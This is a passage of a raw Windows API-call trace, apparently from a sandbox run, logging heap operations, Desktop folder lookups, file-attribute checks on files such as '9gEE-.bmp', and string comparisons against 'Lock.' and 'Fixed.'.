hHeap=0x2af0000) returned 1 [0087.950] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.950] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0087.951] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.951] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6418 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0087.951] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0087.951] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75150 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6418 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x44) returned 0x2a5d700 [0087.952] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/7jATM.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\7jATM.wav", lpFilePart=0x8cf650*="7jATM.wav") returned 0x21 [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d700 | out: hHeap=0x2af0000) returned 1 [0087.952] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7jATM.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\7jatm.wav")) returned 0xffffffff [0087.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75150 | out: hHeap=0x2af0000) returned 1 [0087.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0087.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0087.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0087.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0087.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0087.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0087.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9gEE-.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gEE-.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EE-.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0087.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0087.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9gEE-.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0087.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gEE-.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0087.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EE-.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0087.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0087.954] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0087.954] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0087.954] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0087.955] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0087.955] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6530 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0087.955] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0087.955] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0087.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0087.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0087.956] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0087.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.956] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0087.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.956] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/9gEE-.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 0x9a4180 [0087.956] FindClose (in: hFindFile=0x9a4180 | out: hFindFile=0x9a4180) returned 1 [0087.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.957] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.958] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.958] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 